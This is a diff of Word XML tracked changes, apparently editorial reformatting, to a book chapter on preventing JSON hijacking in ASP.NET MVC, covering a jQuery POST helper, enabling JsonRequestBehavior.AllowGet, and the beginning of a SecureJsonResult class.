-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:del w:id="134" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="135" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:del w:id="136" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="137" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:del w:id="138" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="139" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
         <w:t>$('#securepost').html(options);</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">      </w:t>
       </w:r>
-      <w:r>
-        <w:t>#|2</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
+      <w:ins w:id="140" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:t xml:space="preserve">              |</w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t>#</w:t>
+      </w:r>
+      <w:del w:id="141" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:delText>|</w:delText>
+        </w:r>
+      </w:del>
+      <w:r>
+        <w:t>2</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:del w:id="142" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="143" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:del w:id="144" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="145" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
         <w:t>});</w:t>
       </w:r>
     </w:p>
@@ -3226,8 +3874,17 @@
       <w:pPr>
         <w:pStyle w:val="Code"/>
       </w:pPr>
-      <w:r>
-        <w:tab/>
+      <w:del w:id="146" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="147" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
         <w:t>});</w:t>
       </w:r>
     </w:p>
@@ -3249,7 +3906,6 @@
         <w:pStyle w:val="Code"/>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve"> &lt;h2&gt;Secure Json (Post)&lt;/h2&gt;</w:t>
       </w:r>
     </w:p>
@@ -3269,7 +3925,15 @@
         <w:t xml:space="preserve">    &lt;select id="securepost"/&gt;</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">            #3</w:t>
+        <w:t xml:space="preserve">            </w:t>
+      </w:r>
+      <w:ins w:id="148" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:t xml:space="preserve">                        </w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t>#3</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3288,213 +3952,11 @@
         <w:t>#1 A helper function for JSON POST</w:t>
       </w:r>
     </w:p>
+    <w:commentRangeEnd w:id="48"/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="CodeAnnotation"/>
       </w:pPr>
-      <w:r>
-        <w:t>#2 Our script populates select  options</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="CodeAnnotation"/>
-      </w:pPr>
-      <w:r>
-        <w:t>#3 The target select element</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Body1"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Listing 11.12 uses the jQuery JavaScript library to craft a special POST request for our JSON data </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Bold"/>
-        </w:rPr>
-        <w:t>(1)</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.  When the results are returned</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">, the function </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Bold"/>
-        </w:rPr>
-        <w:t>(2)</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> populates the select list with them.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Head3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>11.3.3.2 Override defaults for GET access</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Body"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">The problem with this approach is not necessarily technical - it works and it prevents JSON hijacking.  But it's a workaround that is sometimes </w:t>
-      </w:r>
-      <w:r>
-        <w:t>unnecessary</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> and can interfere with systems developed using the REST architectural style.  In those circumstances we have additional options.  First, we can explicitly enable JSON requests from GETs </w:t>
-      </w:r>
-      <w:r>
-        <w:t>by code shown in listing 11.13.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="CodeListingCaption"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Listing 11.13 Directing JsonResult to accept GETs</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t>[HttpGet]</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t>public JsonResult GetInsecureJson()</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t>{</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-        <w:t>object data = GetData();</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-        <w:t>return Json(data, JsonRequestBehavior.AllowGet);</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">      #1</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t>}</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="CodeAnnotation"/>
-      </w:pPr>
-      <w:r>
-        <w:t>#1: Directing JsonResult to allow GETs</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Body1"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">This will allow our action to respond to normal JSON GET requests.  Finally, we can scrap JsonResult itself, instead using an action result to return only non-vulnerable, non-array formatted, JSON. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Head3"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">11.3.3.3 </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Modifying</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> the</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> JSON response</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Body1"/>
-      </w:pPr>
-      <w:r>
-        <w:t>The code in listing 11.14 shows a special action result that wraps vulnerable JSON data in a variable "d".</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="CodeListingCaption"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Listing 11.</w:t>
-      </w:r>
-      <w:commentRangeStart w:id="22"/>
-      <w:commentRangeStart w:id="23"/>
-      <w:r>
-        <w:t xml:space="preserve">14 </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">Creating  a </w:t>
-      </w:r>
-      <w:r>
-        <w:t>SecureJsonResult</w:t>
-      </w:r>
-      <w:commentRangeEnd w:id="22"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CommentReference"/>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
-          <w:b w:val="0"/>
-          <w:vanish/>
-          <w:color w:val="000000"/>
-        </w:rPr>
-        <w:commentReference w:id="22"/>
-      </w:r>
-      <w:commentRangeEnd w:id="23"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
@@ -3502,7 +3964,214 @@
           <w:color w:val="000000"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:commentReference w:id="23"/>
+        <w:commentReference w:id="48"/>
+      </w:r>
+      <w:r>
+        <w:t>#2 Our script populates select  options</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CodeAnnotation"/>
+      </w:pPr>
+      <w:r>
+        <w:t>#3 The target select element</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body1"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Listing 11.12 uses the jQuery JavaScript library to craft a special POST request for our JSON data </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Bold"/>
+        </w:rPr>
+        <w:t>(1)</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.  When the results are returned</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, the function </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Bold"/>
+        </w:rPr>
+        <w:t>(2)</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> populates the select list with them.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Head3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>11.3.3.2 Override defaults for GET access</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">The problem with this approach is not necessarily technical - it works and it prevents JSON hijacking.  But it's a workaround that is sometimes </w:t>
+      </w:r>
+      <w:r>
+        <w:t>unnecessary</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> and can interfere with </w:t>
+      </w:r>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">systems developed using the REST architectural style.  In those circumstances we have additional options.  First, we can explicitly enable JSON requests from GETs </w:t>
+      </w:r>
+      <w:r>
+        <w:t>by code shown in listing 11.13.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CodeListingCaption"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Listing 11.13 Directing JsonResult to accept GETs</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t>[HttpGet]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t>public JsonResult GetInsecureJson()</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t>{</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+        <w:t>object data = GetData();</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+        <w:t>return Json(data, JsonRequestBehavior.AllowGet);</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">      #1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CodeAnnotation"/>
+      </w:pPr>
+      <w:r>
+        <w:t>#1: Directing JsonResult to allow GETs</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body1"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">This will allow our action to respond to normal JSON GET requests.  Finally, we can scrap </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+          <w:rPrChange w:id="149" w:author="JSkinner" w:date="2010-03-03T17:56:00Z">
+            <w:rPr>
+              <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
+              <w:color w:val="auto"/>
+              <w:sz w:val="18"/>
+              <w:szCs w:val="20"/>
+            </w:rPr>
+          </w:rPrChange>
+        </w:rPr>
+        <w:t>JsonResult</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> itself, instead using an action result to return only non-vulnerable, non-array formatted, JSON. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Head3"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">11.3.3.3 </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Modifying</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> the</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> JSON response</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body1"/>
+      </w:pPr>
+      <w:r>
+        <w:t>The code in listing 11.14 shows a special action result that wraps vulnerable JSON data in a variable "d".</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CodeListingCaption"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Listing 11.14 </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Creating  a </w:t>
+      </w:r>
+      <w:r>
+        <w:t>SecureJsonResult</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> action result encapsulates the tricky JSON serialization logic.</w:t>
@@ -3565,6 +4234,7 @@
       <w:pPr>
         <w:pStyle w:val="Code"/>
       </w:pPr>
+      <w:commentRangeStart w:id="150"/>
       <w:r>
         <w:t>{</w:t>
       </w:r>
@@ -3573,9 +4243,812 @@
       <w:pPr>
         <w:pStyle w:val="Code"/>
       </w:pPr>
+      <w:del w:id="151" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="152" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t>if (context == null)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:del w:id="153" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="154" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t>{</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:del w:id="155" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="156" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:del w:id="157" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="158" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t>throw new ArgumentNullException("context");</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:del w:id="159" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="160" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:del w:id="161" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="162" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t>HttpResponseBase response = context.HttpContext.Response;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:del w:id="163" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="164" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t>if (!string.IsNullOrEmpty(ContentType))</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">                </w:t>
+      </w:r>
+      <w:ins w:id="165" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:t xml:space="preserve">     </w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t>|#2</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:del w:id="166" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="167" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t>{</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">                                                      </w:t>
+      </w:r>
+      <w:ins w:id="168" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:t xml:space="preserve">     </w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t>|#2</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:del w:id="169" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="170" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:del w:id="171" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="172" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t>response.ContentType = ContentType;</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">               </w:t>
+      </w:r>
+      <w:ins w:id="173" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:t xml:space="preserve">      </w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t>|#2</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:del w:id="174" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="175" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t>}</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">                                                 </w:t>
+      </w:r>
+      <w:ins w:id="176" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:t xml:space="preserve">          </w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t>|#2</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:del w:id="177" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="178" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:del w:id="179" w:author="JSkinner" w:date="2010-03-03T17:56:00Z">
+        <w:r>
+          <w:delText>E</w:delText>
+        </w:r>
+        <w:r>
+          <w:delText>lse</w:delText>
+        </w:r>
+        <w:r>
+          <w:delText xml:space="preserve">                                        </w:delText>
+        </w:r>
+      </w:del>
+      <w:ins w:id="180" w:author="JSkinner" w:date="2010-03-03T17:56:00Z">
+        <w:r>
+          <w:t>e</w:t>
+        </w:r>
+        <w:r>
+          <w:t>lse</w:t>
+        </w:r>
+        <w:r>
+          <w:t xml:space="preserve">                                        </w:t>
+        </w:r>
+      </w:ins>
+      <w:ins w:id="181" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:t xml:space="preserve">                </w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t>|#2</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:del w:id="182" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="183" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t>{</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">                                                       </w:t>
+      </w:r>
+      <w:ins w:id="184" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t>|#2</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:del w:id="185" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="186" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:del w:id="187" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="188" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t>response.ContentType = "application/json";</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:ins w:id="189" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:t xml:space="preserve">          </w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t>|#2</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:del w:id="190" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="191" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:del w:id="192" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="193" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t>if (ContentEncoding != null)</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">                                </w:t>
+      </w:r>
+      <w:del w:id="194" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:delText xml:space="preserve"> </w:delText>
+        </w:r>
+      </w:del>
+      <w:r>
+        <w:t>|#2</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:del w:id="195" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="196" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t>{</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:del w:id="197" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="198" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:del w:id="199" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="200" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t>response.ContentEncoding = ContentEncoding;</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">          </w:t>
+      </w:r>
+      <w:ins w:id="201" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:t xml:space="preserve">   </w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t>|#2</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:del w:id="202" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="203" w:author="JSkinner" w:date="2010-03-03T17:57:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t>}</w:t>
